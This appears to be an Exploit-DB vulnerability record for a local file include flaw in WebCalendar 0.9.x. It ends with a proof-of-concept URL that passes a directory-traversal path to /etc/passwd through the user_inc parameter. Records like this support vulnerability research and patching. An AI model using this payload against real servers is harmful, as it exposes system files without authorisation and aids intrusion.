WebCalendar 0.9.x - Local File Include Information Disclosure Vulnerability

2003-07-21T00:00:00
ID EDB-ID:22942
Type exploitdb
Reporter noconflic
Modified 2003-07-21T00:00:00

Description

WebCalendar 0.9.x Local File Include Information Disclosure Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/8237/info

It has been reported that an information disclosure issue exists in WebCalendar. This may allow an attacker to gain unauthorized read access to potentially sensitive information with the privileges of the web server process.

http://www.example.com/webcalendar/[filename].php?user_inc=../../../../../etc/passwd